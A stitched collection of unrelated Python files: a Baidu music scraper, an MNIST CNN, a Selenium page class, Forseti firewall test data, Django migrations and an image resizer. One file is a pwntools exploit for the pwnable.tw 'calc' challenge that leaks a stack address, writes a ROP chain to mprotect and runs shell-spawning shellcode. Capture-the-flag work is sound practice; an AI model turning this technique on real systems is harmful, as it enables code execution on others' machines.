# html = re.search(r'<div class="mod-tag clearfix">(.*?)</div>',html,re.S).group(1)
# print html
soup = etree.HTML(html)
dl = soup.xpath('//div[@class="tag-main"]/div/dl')
# div = soup.xpath('//div[normalize-space(@class)="mod-tag clearfix"]/text()')
tag_url_list = {} #所有标签
clazz = [] #所有分类
for d in dl:
title = d.xpath('dt/text()')
# print title[0]
items = d.xpath('dd/span/a/text()')
url_list = d.xpath('dd/span/a/@href')
items_url_list = {}
m = 0
for i in items:
# print i
items_url_list[i] = url_list[m]
m+=1
clazz.append(urlcode_tr(title[0]))
tag_url_list[urlcode_tr(title[0])] = items_url_list
return tag_url_list,clazz
#获取该标签的总音乐数
def get_music_totalpage(musiclist_html):
soup = etree.HTML(musiclist_html)
# span = soup.xpath('//div[@class="main-body-cont"]/div[@class="target-tag"]/span[@class="total"]/span/text()')
# total = span[0]
totalpage = soup.xpath('//div[@class="page-cont"]/div[@class="page-inner"]/a/text()')
if not totalpage:
totalpage = 1
return int(totalpage)
else:
return int(totalpage[-2])
#获取音乐url
def get_music_url(musiclist_html):
soup = etree.HTML(musiclist_html)
li = soup.xpath('//div[@class="main-body-cont"]/div[@class="tag-main"]/div[@data-listdata]/ul/li')
music_url_list = []
for l in li:
href = l.xpath('div/span[@class="song-title"]/a[1]/@href')
music_url_list.append(href)
return music_url_list
#获取音乐信息
def save_one_music_information(music_html,tag_dir,filename):
soup = etree.HTML(music_html)
li = []
title = []
songname = soup.xpath('//div[@class="mod-song-info"]/div[@class="song-info"]/div[@class="play-holder clearfix"]/div/h2/span[@class="name"]/text()') #歌曲名
li.append(soup.xpath('//div[@class="mod-song-info"]/div[@class="song-info"]//ul[@class="base-info c6"]/li[not(@class)]')) # 歌手
li.append(soup.xpath('//div[@class="mod-song-info"]/div[@class="song-info"]//ul[@class="base-info c6"]/li[@class="clearfix"]')) # 所属专辑
li.append(soup.xpath('//div[@class="mod-song-info"]/div[@class="song-info"]//ul[@class="base-info c6"]/li[@class="clearfix tag"]')) # 歌曲标签
lyric = soup.xpath('//div[@class="mod-song-info"]/div[@class="module song-lyric clicklog-lyric clearfix"]/div[@class="body "]/div[@class="lyric-content"]/@data-lrclink') # 歌词
dict = {}
#歌曲名
# dict[u'歌曲名:'] = songname[0]
i = 0
# 歌手
if len(li[i]) >= 1:
title.append(li[i][0].xpath('text()'))
span = li[i][0].xpath('span[@class="author_list"]/a/text()')
dict[title[i][0]] = span
i += 1
# 所属专辑
if len(li[i]) >= 1:
title.append(li[i][0].xpath('text()'))
span = li[i][0].xpath('a/text()')
dict[title[i][0]] = span
i += 1
# 歌曲标签
if len(li[i]) >= 1:
title.append(li[i][0].xpath('span/text()'))
span = li[i][0].xpath('a/text()')
dict[title[i][0]] = span
i += 1
str = ''
for k in dict.keys():
str = str + ''.join(k + '|'.join(dict[k]) + '-')
# print str
# print dict[k]
print tag_dir+'\\'+filename,u"歌曲名:"+del_illegal_char(songname[0])+"-"+(trim(str) + '\n').replace(u':', ':')
write_text_file(tag_dir+'\\'+filename,u"歌曲名:"+del_illegal_char(songname[0])+"-"+(trim(str) + '\n').replace(u':', ':'))
#写歌词
if lyric:
write_content_file(tag_dir+'\\'+del_illegal_char(songname[0])+'.lrc',get_html(lyric[0]))
def save_all_music_information(first_url,tag_url_list,clazz):
global start,flag
start = 0
size = 20
start = start - size
third_type = 0
for c in clazz:
if c==u'乐播':
continue
url_dict = tag_url_list[c]
tag_mod_dir = create_dir(file_root_dir + '\\' + c) # 分类文件夹
url_list = []
dict = readdict() #存放标签是否被爬过的字典
for k in url_dict.keys():
d_flag = 0 #判断此标签有没有被爬过
flag = 1
for d in dict:
if k == d and dict[d] != 0:
d_flag = 1
print k+' '+u'已被爬取过...'
break
if d_flag == 1:
continue
v = url_dict[k]
foldername = urlcode_tr(v.rsplit('/', 1)[-1])
tag_dir = create_dir(tag_mod_dir + '\\' + foldername) #标签文件夹
filename = 'all_'+foldername+'.txt'#该文件存储所有歌曲信息
totalpage = get_music_totalpage(get_html(first_url + v))
start = 0 - size
total = totalpage * size
# totalpage = 1
music_url_list = []
print 'start spider...'
while True:
start += size
end = total / (start+size)
if end<1:
break
musiclist_html = get_html(first_url+v+'?'+'start={start}&size=20&third_type=0'.format(start=start))
music_url_list.extend(get_music_url(musiclist_html))
# print music_url_list
for music_url in music_url_list:
music_html = get_html(index+music_url[0])
#print u'正在索引'
#print u'正在向{}写入{}文件'.format(tag_dir,filename)
if is_404(music_html):
continue
# th = threading.Thread(target=save_one_music_information,args=(music_html,tag_dir,filename))
# th.start()
save_one_music_information(music_html,tag_dir,filename)
# break #正式工作时注释
dict[k] = 1
writedict(dict)
url_list.append('http://music.baidu.com/tag' + '/' + foldername)
# time.sleep(6) # 爬取一个类别之后停顿一段时间,以免被服务器发现爬虫行为
write_text_file(tag_mod_dir + '\\' + 'url_list.txt', url_list)#存储各个分类下各个标签的url
# break #正式工作时注释
# 热门/新歌
# tag_mod_dir+'\\'+tag_dir
# music_information.txt
def main():
global file_root_dir
file_root_dir = 'file'
create_dir(file_root_dir)
global index,flag
index = 'http://music.baidu.com'
tag_url = "http://music.baidu.com/tag"
tag_html = get_html(tag_url)
tag_url_list,clazz = get_tag_url_list(tag_html)
save_all_music_information(index,tag_url_list,clazz)
if __name__=="__main__":
main()
|
#!/usr/bin/env python3
import pwn
# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('../calc')
# Run this python script inside tmux like this:
# $> tmux
# $> ./exploit GDB
# It will spawn a separate window with the GDB session
pwn.context.terminal = ["tmux", "splitw", "-h"]
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
# Just before returning from calc
break *0x08049433
break mprotect
continue
'''.format(**locals())
main_ret_address_offset = 361 # Offset where return address from the call to calc is stored
esp_placed_at_offset = 400 # At this offset, ESP was pushed to the stack
def start(argv=[], *a, **kw):
"""Start the exploit against the target."""
if pwn.args.GDB:
return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
elif pwn.args.LOCAL:
return pwn.process([exe.path] + argv, *a, **kw)
else:
return pwn.remote('chall.pwnable.tw', 10100)
def read_stack_offset(offset):
assert offset > 0
io.send(str(offset) + '+00\n')
signed = int(io.recvline())
unsigned = signed % 2**32
return unsigned
def get_absolute_stack_address_below_main():
offset = read_stack_offset(esp_placed_at_offset)
pwn.success("Read offset: 0x%08x" % offset)
return offset - (esp_placed_at_offset - main_ret_address_offset) * 4
def write_stack_offset(offset, value):
assert offset > 0
assert value > 0
assert value != 0
if value >= 2**31:
# This is a negative value and cannot
# be written directly
# Instead, write 1 to the offset,
# then subtract such that value is obtained
# This does destroy the value offset + 1
write_stack_offset(offset, 1)
val = 2 ** 32 - value + 1
assert 0 < val < 2**31
io.send(str(offset + 1) + '*00-' + str(val) + '\n')
else:
# Value is in range 0 < value < 2**31
# Just write the value directly
io.send(str(offset) + '*' + '00%' + str(value) + '\n')
io.recvline()
def write_rop_chain_to_addr(addr, rop_chain):
assert len(rop_chain) % 4 == 0
for x in range(0, int(len(rop_chain)/4)):
val = rop_chain[x*4:(x + 1)*4]
val = pwn.u32(val)
write_stack_offset(x + addr, val)
mprotect_addr = exe.symbols['mprotect']
io = start()
io.recvuntil("=== Welcome to SECPROG calculator ===\n")
stack_addr = get_absolute_stack_address_below_main()
stack_addr_mod_pagesize = stack_addr - (stack_addr % 4096)
pwn.success("Stack absolute address is 0x%08x" % stack_addr)
pwn.success("Stack absolute address mod pagesize is 0x%08x" % stack_addr_mod_pagesize)
rop_chain = (
pwn.p32(mprotect_addr) + # return from calc, go to mprotect
pwn.p32(stack_addr + 16) + # return address after mprotect, go to shellcode
pwn.p32(stack_addr_mod_pagesize) + # mprotect param: addr
pwn.p32(4096) + # mprotect param: page size
pwn.p32(7) + # mprotect param: rwx
pwn.asm(pwn.shellcraft.sh()) # shellcode after stack has been marked executable
)
pwn.debug("ROP chain:\n%s" % pwn.hexdump(rop_chain))
write_rop_chain_to_addr(main_ret_address_offset, rop_chain)
io.sendline()
io.interactive()
|
import tensorflow as tf
import matplotlib
import matplotlib.pyplot as plt
''' 加载数据集 '''
mnist = tf.keras.datasets.mnist
(x_train, y_train),(x_test, y_test) = mnist.load_data()
# 将(-1,28,28)的图片变成(-1,28,28,1)
x_train = x_train.reshape((-1,28,28,1))
x_test = x_test.reshape((-1,28,28,1))
# 归一化处理
x_train, x_test = x_train / 255.0, x_test / 255.0
''' --> 构建CNN模型 '''
model = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(input_shape=(x_train.shape[1],
x_train.shape[2], x_train.shape[3]),
filters=32,kernel_size=(3,3), strides=(1,1),
padding='valid',activation='relu'),
tf.keras.layers.MaxPool2D(pool_size=(2,2)),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.Dense(10, activation='softmax')
])
'''--> 定义损失函数与优化器 '''
model.compile(optimizer=tf.keras.optimizers.Adam (), # 定义优化器
loss=tf.keras.losses.sparse_categorical_crossentropy, # 定义损失函数
metrics=['accuracy']) # 计算预测正确率
'''--> 训练模型 '''
history = model.fit(x_train, y_train, epochs=4,validation_split=0.2)
|
import time
from typing import List, Tuple, Union
from selenium.common.exceptions import (
NoSuchElementException,
TimeoutException,
)
from selenium.webdriver.chrome.webdriver import WebDriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.ui import WebDriverWait
from utilites.decorators import add_logger
import logging
logger = logging.getLogger(__name__)
'''
The BasePage class is a base class that all the Pages that will inherit from this
BasePage class. Some most common method is written here that we're gonna need
all over the project/Pages to work with.
written_by: jiaul_islam
'''
class BasePage(object):
"""
All the Page will inherit this class BasePage Class to use the common
functionality.
"""
def __init__(self, driver: WebDriver, timeout: int = 30) -> None:
self._driver: WebDriver = driver
self.timeout = timeout
def find_element(self, *locator) -> WebElement:
""" Find the element by the help of the locator that user shared """
try:
return self._driver.find_element(*locator)
except TypeError as error:
print(f"Unexpected Type Error [base.py || Line - 37]"
f"\n{repr(error)}")
except AttributeError as error:
print(f"Unexpected Attribute Error in find_element() ||\n{repr(error)}")
except NoSuchElementException:
pass
def find_elements(self, *locator) -> Union[List[WebElement], None]:
""" Find the elements by the help of the locator that user shared """
try:
return self._driver.find_elements(*locator)
except TypeError as error:
print(f"Unexpected Value Error [base.py || Line - 47]"
f"\n{repr(error)}")
except AttributeError as error:
print(f"Unexpected Attribute Error in find_elements() ||\n{repr(error)}")
except NoSuchElementException:
pass
def is_visible(self, xpath_locator) -> bool:
""" If the element is found in the Page then return True else False """
try:
_element = WebDriverWait(self._driver, self.timeout).until(
ec.visibility_of_element_located(xpath_locator))
except TimeoutException:
pass
except AttributeError as error:
print(f"Unexpected Attribute Error [base.py || Line - 60]"
f"\n{repr(error)}")
else:
return bool(_element)
@add_logger
def click(self, element_locator_xpath) -> None:
""" Click a web element by a locator shared by the user """
WebDriverWait(driver=self._driver,
timeout=self.timeout,
ignored_exceptions=None
).until(ec.visibility_of_element_located(element_locator_xpath)).click()
@add_logger
def write(self, xpath_locator: Tuple[By, str], text: str) -> None:
""" Write the text in web element by a locator shared by the user """
WebDriverWait(self._driver, self.timeout).until(
ec.visibility_of_element_located(xpath_locator)).send_keys(text)
@add_logger
def hover_over(self, xpath_locator: str) -> None:
""" Hover over the element shared by the user locator """
_element: Union[WebElement, None] = WebDriverWait(self._driver, self.timeout).until(
ec.visibility_of_element_located(xpath_locator))
if _element is not None:
ActionChains(self._driver).move_to_element(_element).perform()
else:
raise AttributeError
@add_logger
def switch_to_frame(self, xpath_locator) -> None:
""" Switch to a frame by a frame locator """
_frame: Union[WebElement, None] = self._driver.find_element(*xpath_locator)
self._driver.switch_to.frame(_frame)
@add_logger
def double_click(self, xpath_locator: Tuple[By, str]) -> None:
""" Double click on a element by a locator """
_element: Union[WebElement, None] = WebDriverWait(self._driver, self.timeout, 2).until(
ec.visibility_of_element_located(xpath_locator))
ActionChains(self._driver).double_click(_element).perform()
@add_logger
def select_all(self, xpath_locator: Tuple[By, str]) -> None:
""" Sends CTRL + A action to a page """
WebDriverWait(self._driver, self.timeout).until(
ec.visibility_of_element_located(xpath_locator)).click()
ActionChains(self._driver).key_down(
Keys.CONTROL).send_keys('a').key_up(Keys.CONTROL).perform()
def get_text(self, xpath_locator: Tuple[By, str]) -> str:
""" Get the text value of a web element shared by a user """
try:
_val_of_elem: str = WebDriverWait(self._driver, self.timeout).until(
ec.visibility_of_element_located(xpath_locator)).get_attribute("value")
except TimeoutException as error:
print(f"Unexpected Timeout Error [base.py || Line - 145]"
f"\n{repr(error)}")
else:
return _val_of_elem
@add_logger
def handle_frame_alert(self, frame_locator: str, ok_btn_locator: str) -> None:
""" Checks for expected frames and press OK button in the frame """
self.switch_to_frame(frame_locator)
self.click(ok_btn_locator)
self._driver.switch_to.default_content()
@add_logger
def back_to_home_page(self, xpath_locator: Tuple[By, str]) -> None:
""" Return to the homepage """
self.click(xpath_locator)
def wait_for_loading_icon_disappear(self, *locator: Tuple[By, str], _time: float = 1, _range: int = 600) -> None:
""" Wait for loading_icon to vanish """
_counter = 1
while _counter <= _range:
_loading_icons: list = self._driver.find_elements(*locator)
if not len(_loading_icons):
break
time.sleep(_time)
_counter += 1
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Sample data used in testing gce_enforcer.
Consists exclusively of test constants.
"""
TEST_PROJECT = "test-project"
TEST_NETWORK = "test-network"
SAMPLE_TEST_NETWORK_SELFLINK = {
"items": [
{
"selfLink": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network")
},
]
}
RAW_EXPECTED_JSON_POLICY = """
[
{
"sourceRanges": [
"10.8.0.0/24"
],
"description": "Allow communication between instances.",
"allowed": [
{
"IPProtocol": "udp",
"ports": [
"1-65535"
]
},
{
"IPProtocol": "tcp",
"ports": [
"1-65535"
]
},
{
"IPProtocol": "icmp"
}
],
"name": "allow-internal-1"
},
{
"sourceRanges": [
"10.0.0.0/8"
],
"description": "Allow internal traffic from a range of IP addresses.",
"allowed": [
{
"IPProtocol": "udp",
"ports": [
"1-65535"
]
},
{
"IPProtocol": "tcp",
"ports": [
"1-65535"
]
},
{
"IPProtocol": "icmp"
}
],
"name": "allow-internal-0"
},
{
"sourceRanges": [
"127.0.0.1/32",
"127.0.0.2/32"
],
"description": "Allow public traffic from specific IP addresses.",
"allowed": [
{
"IPProtocol": "tcp",
"ports": [
"22"
]
},
{
"IPProtocol": "udp",
"ports": [
"9999"
]
},
{
"IPProtocol": "esp"
},
{
"IPProtocol": "ah"
}
],
"name": "allow-public-0"
}
]
"""
EXPECTED_FIREWALL_API_RESPONSE = {
"id":
u"projects/test-project/global/firewalls",
"items": [{
"sourceRanges": [u"10.8.0.0/24"],
"creationTimestamp":
u"2015-09-04T14:03:38.591-07:00",
"id":
u"3140311180993083845",
"kind":
u"compute#firewall",
"description":
u"Allow communication between instances.",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"udp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"tcp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"icmp"
}],
"name":
u"test-network-allow-internal-1"
}, {
"sourceRanges": [u"10.0.0.0/8"],
"description": (u"Allow internal traffic from a range of IP "
"addresses."),
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"udp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"tcp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"icmp"
}],
"name":
u"test-network-allow-internal-0"
}, {
"sourceRanges": [u"127.0.0.1/32", u"127.0.0.2/32"],
"description":
u"Allow public traffic from specific IP addresses.",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"tcp",
"ports": [u"22"]
}, {
"IPProtocol": u"udp",
"ports": [u"9999"]
}, {
"IPProtocol": u"esp"
}, {
"IPProtocol": u"ah"
}],
"name":
u"test-network-allow-public-0"
}],
"kind":
u"compute#firewallList",
"selfLink": (
u"https://www.googleapis.com/compute/beta/projects/test-project/global/"
"firewalls")
}
EXPECTED_FIREWALL_RULES = {
"test-network-allow-internal-1": {
"allowed": [{
"IPProtocol": u"icmp"
}, {
"IPProtocol": u"tcp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"udp",
"ports": [u"1-65535"]
}],
"description":
u"Allow communication between instances.",
"name":
u"test-network-allow-internal-1",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"sourceRanges": [u"10.8.0.0/24"],
"priority": 1000,
"direction": "INGRESS"},
"test-network-allow-internal-0": {
"allowed": [{
"IPProtocol": u"icmp"
}, {
"IPProtocol": u"tcp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"udp",
"ports": [u"1-65535"]
}],
"description": (u"Allow internal traffic from a range of IP "
"addresses."),
"name":
u"test-network-allow-internal-0",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"sourceRanges": [u"10.0.0.0/8"],
"priority": 1000,
"direction": "INGRESS"},
"test-network-allow-public-0": {
"allowed": [{
"IPProtocol": u"ah"
}, {
"IPProtocol": u"esp"
}, {
"IPProtocol": u"tcp",
"ports": [u"22"]
}, {
"IPProtocol": u"udp",
"ports": [u"9999"]
}],
"description":
u"Allow public traffic from specific IP addresses.",
"name":
u"test-network-allow-public-0",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"sourceRanges": [u"127.0.0.1/32", u"127.0.0.2/32"],
"priority": 1000,
"direction": "INGRESS"},
}
RAW_DEFAULT_JSON_POLICY = """
[
{
"sourceRanges": ["0.0.0.0/0"],
"description": "Allow ICMP from anywhere",
"allowed": [
{
"IPProtocol": "icmp"
}
],
"name": "allow-icmp"
},
{
"sourceRanges": ["10.240.0.0/16"],
"description": "Allow internal traffic on the default network.",
"allowed": [
{
"IPProtocol": "udp",
"ports": ["1-65535"]
},
{
"IPProtocol": "tcp",
"ports": ["1-65535"]
},
{
"IPProtocol": "icmp"
}
],
"name": "allow-internal"
},
{
"sourceRanges": ["0.0.0.0/0"],
"description": "Allow RDP from anywhere",
"allowed": [
{
"IPProtocol": "tcp",
"ports": ["3389"]
}
],
"name": "allow-rdp"
},
{
"sourceRanges": ["0.0.0.0/0"],
"description": "Allow SSH from anywhere",
"allowed": [
{
"IPProtocol": "tcp",
"ports": ["22"]
}
],
"name": "allow-ssh"
}
]
"""
DEFAULT_FIREWALL_API_RESPONSE = {
"id":
u"projects/test-project/global/firewalls",
"items": [{
"sourceRanges": [u"0.0.0.0/0"],
"creationTimestamp":
u"2015-09-04T14:03:38.591-07:00",
"id":
u"3140311180993083845",
"kind":
u"compute#firewall",
"description":
u"Allow ICMP from anywhere",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"icmp"
}],
"name":
u"test-network-allow-icmp"
}, {
"sourceRanges": [u"10.240.0.0/16"],
"description": (u"Allow internal traffic on the default network."),
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"udp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"tcp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"icmp"
}],
"name":
u"test-network-allow-internal"
}, {
"sourceRanges": [u"0.0.0.0/0"],
"description":
u"Allow RDP from anywhere",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [
{
"IPProtocol": u"tcp",
"ports": [u"3389"]
},
],
"name":
u"test-network-allow-rdp"
}, {
"sourceRanges": [u"0.0.0.0/0"],
"description":
u"Allow SSH from anywhere",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [
{
"IPProtocol": u"tcp",
"ports": [u"22"]
},
],
"name":
u"test-network-allow-ssh"
}],
"kind":
u"compute#firewallList",
"selfLink": (
u"https://www.googleapis.com/compute/beta/projects/test-project/global/"
"firewalls")
}
DEFAULT_FIREWALL_RULES = {
u"test-network-allow-icmp": {
"sourceRanges": [u"0.0.0.0/0"],
"creationTimestamp":
u"2015-09-04T14:03:38.591-07:00",
"id":
u"3140311180993083845",
"kind":
u"compute#firewall",
"description":
u"Allow ICMP from anywhere",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"icmp"
}],
"name":
u"test-network-allow-icmp"
},
u"test-network-allow-internal": {
"sourceRanges": [u"10.240.0.0/16"],
"description": (u"Allow internal traffic on the default network."),
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"udp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"tcp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"icmp"
}],
"name":
u"test-network-allow-internal"
},
u"test-network-allow-rdp": {
"sourceRanges": [u"0.0.0.0/0"],
"description":
u"Allow RDP from anywhere",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [
{
"IPProtocol": u"tcp",
"ports": [u"3389"]
},
],
"name":
u"test-network-allow-rdp"
},
u"test-network-allow-ssh": {
"sourceRanges": [u"0.0.0.0/0"],
"description":
u"Allow SSH from anywhere",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [
{
"IPProtocol": u"tcp",
"ports": [u"22"]
},
],
"name":
u"test-network-allow-ssh"
}
}
SAMPLE_ENFORCER_PROJECTRESULTS_ASCIIPB = """
project_id: 'test-project'
timestamp_sec: 1234567890
batch_id: 1234567890
run_context: ENFORCER_BATCH
status: SUCCESS
gce_firewall_enforcement {
rules_before {
json: '[{"allowed": [{"IPProtocol": "icmp"}], "description": '
'"Allow ICMP from anywhere", "direction": "INGRESS", '
'"name": "test-network-allow-icmp", '
'"network": "https://www.googleapis.com/compute/beta/projects/'
'test-project/global/networks/test-network", "priority": 1000, '
'"sourceRanges": '
'["0.0.0.0/0"]}, {"allowed": [{"IPProtocol": "icmp"}, '
'{"IPProtocol": "tcp", "ports": ["1-65535"]}, {"IPProtocol": '
'"udp", "ports": ["1-65535"]}], "description": "Allow internal '
'traffic on the default network.", "direction": "INGRESS", "name": '
'"test-network-allow-internal", "network": '
'"https://www.googleapis.com/compute/beta/projects/test-project/'
'global/networks/test-network", "priority": 1000, "sourceRanges": '
'["10.240.0.0/16"]},'
' {"allowed": [{"IPProtocol": "tcp", "ports": ["3389"]}], '
'"description": "Allow RDP from anywhere", "direction": "INGRESS", '
'"name": '
'"test-network-allow-rdp", "network": '
'"https://www.googleapis.com/compute/beta/projects/test-project/'
'global/networks/test-network", "priority": 1000, "sourceRanges": '
'["0.0.0.0/0"]}, '
'{"allowed": [{"IPProtocol": "tcp", "ports": ["22"]}], '
'"description": "Allow SSH from anywhere", "direction": "INGRESS", '
'"name": '
'"test-network-allow-ssh", "network": '
'"https://www.googleapis.com/compute/beta/projects/test-project/'
'global/networks/test-network", "priority": 1000, "sourceRanges": '
'["0.0.0.0/0"]}]'
hash: "b589a2f63159e3450e07e9437fcda83c3dc3c343873bfb4c5c12f1a391ea9813"
}
rules_after {
json: '[{"allowed": [{"IPProtocol": "icmp"}, {"IPProtocol": "tcp", '
'"ports": ["1-65535"]}, {"IPProtocol": "udp", "ports": ["1-65535"]'
'}], "description": "Allow internal traffic from a range of IP '
'addresses.", "direction": "INGRESS", '
'"name": "test-network-allow-internal-0", "network": '
'"https://www.googleapis.com/compute/beta/projects/test-project/'
'global/networks/test-network", "priority": 1000, "sourceRanges": '
'["10.0.0.0/8"]}, '
'{"allowed": [{"IPProtocol": "icmp"}, {"IPProtocol": "tcp", '
'"ports": ["1-65535"]}, {"IPProtocol": "udp", "ports": ["1-65535"]'
'}], "description": "Allow communication between instances.", '
'"direction": "INGRESS", "name": "test-network-allow-internal-1", '
'"network": '
'"https://www.googleapis.com/compute/beta/projects/test-project/'
'global/networks/test-network", "priority": 1000, "sourceRanges": '
'["10.8.0.0/24"]}, '
'{"allowed": [{"IPProtocol": "ah"}, {"IPProtocol": "esp"}, '
'{"IPProtocol": "tcp", "ports": ["22"]}, {"IPProtocol": "udp", '
'"ports": ["9999"]}], "description": "Allow public traffic from '
'specific IP addresses.", "direction": "INGRESS", '
'"name": "test-network-allow-public-0", '
'"network": "https://www.googleapis.com/compute/beta/projects/'
'test-project/global/networks/test-network", "priority": 1000, '
'"sourceRanges": '
'["127.0.0.1/32", "127.0.0.2/32"]}]'
hash: "698e6912c23c5f4dee9008ce63ca1cb26da3bcd4c6bac1ab9118a744b18718ec"
}
rules_added: "test-network-allow-internal-0"
rules_added: "test-network-allow-internal-1"
rules_added: "test-network-allow-public-0"
rules_removed: "test-network-allow-icmp"
rules_removed: "test-network-allow-internal"
rules_removed: "test-network-allow-rdp"
rules_removed: "test-network-allow-ssh"
rules_modified_count: 7
all_rules_changed: true
}
"""
|
# Generated by Django 2.0.1 on 2018-07-21 14:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('courses', '0005_auto_20180721_1604'),
]
operations = [
migrations.RenameField(
model_name='course',
old_name='degress',
new_name='degree',
),
]
|
# Generated by Django 2.0.5 on 2018-05-24 01:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Animal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('description', models.CharField(max_length=1000)),
('slug', models.CharField(editable=False, max_length=50)),
],
),
migrations.CreateModel(
name='AnimalPhoto',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('animal_picture', models.ImageField(upload_to='static/imgs')),
('animal', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to='oyun.Animal')),
],
),
migrations.CreateModel(
name='Seviye',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
),
migrations.AddField(
model_name='animal',
name='animal_seviye',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='seviye', to='oyun.Seviye'),
),
]
|
"""Runs protoc with the gRPC plugin to generate messages and gRPC stubs."""
from grpc_tools import protoc
protoc.main((
'',
'-I./protos',
'--python_out=./protos',
'--grpc_python_out=./protos',
'./protos/raft.proto',
))
print('foo') |
# -*- coding: utf-8 -*-
# @Author : wjn
# @File : get_value.py
# @describe: 配置文件读取
from common.read_config import ReadIni
class GetValue(object):
# 读取配置文件
# 获取debug开关的状态
is_debug = ReadIni(node='MODEL').get_value("debug") |
from django.apps import AppConfig
class QuicklookConfig(AppConfig):
name = 'quicklook' |
from PIL import Image
from os import path, makedirs
from argparse import ArgumentParser
import cv2
def get_arguments():
parser = ArgumentParser(description='Utility to resize images while keeping aspect ratio')
#parser.add_argument("image_path", help="Path to image")
parser.add_argument("input_folder", help="From where to load the scaled images")
parser.add_argument("files_to_scale", help="The file containing the names of the images we want to scale")
parser.add_argument("output_folder", help="Where to scale the scaled images")
parser.add_argument("square_side", help="Size of square side", type=int)
parser.add_argument("--depth2rgb", help="If this flag is enabled, images will be converted to RGB with a "
"jet colorization", action='store_true')
args = parser.parse_args()
return args
def scale_image_keep_ratio(image, square_side):
#image.show()
largest_side = max(image.size)
ratio = square_side / float(largest_side)
new_image = Image.new(image.mode, (square_side, square_side))
#print "Old size " + str(image.size) + " new size " + str(new_image.size)
new_w = int(round(image.width * ratio))
new_h = int(round(image.height * ratio))
#import pdb; pdb.set_trace()
scaled_image = image.resize((new_w, new_h))
if (new_w == new_h == square_side):
return scaled_image
top_h = (square_side - new_h) / 2
bottom_h = square_side - (new_h + top_h)
left_w = (square_side - new_w) / 2
right_w = square_side - (new_w + left_w)
#print "Paddings " + str((top_h, bottom_h, left_w, right_w))
new_image.paste(scaled_image, (left_w, top_h))
if(new_w > new_h) and (top_h + bottom_h) > 1: # empty vertical space
top = scaled_image.transform((square_side, top_h), Image.EXTENT, (0, 0, new_w, 1))
bottom = scaled_image.transform((square_side, bottom_h), Image.EXTENT, (0, new_h - 1, new_w, new_h))
new_image.paste(top, (0, 0))
new_image.paste(bottom, (0, top_h + new_h))
elif (left_w + right_w) > 1: # empty horizontal space
left = scaled_image.transform((left_w, square_side), Image.EXTENT, (0, 0, 1, new_h))
right = scaled_image.transform((right_w, square_side), Image.EXTENT, (new_w - 1, 0, new_w, new_h))
new_image.paste(left, (0, 0))
new_image.paste(right, (left_w + new_w, 0))
return new_image
def convert_depth_image_to_jetrgb(image_path):
dimage = cv2.imread(image_path, -1) # load in raw mode
min_value = dimage.min()
max_value = dimage.max()
im_range = (dimage.astype('float32') - min_value) / (max_value - min_value)
im_range = 255.0 * im_range
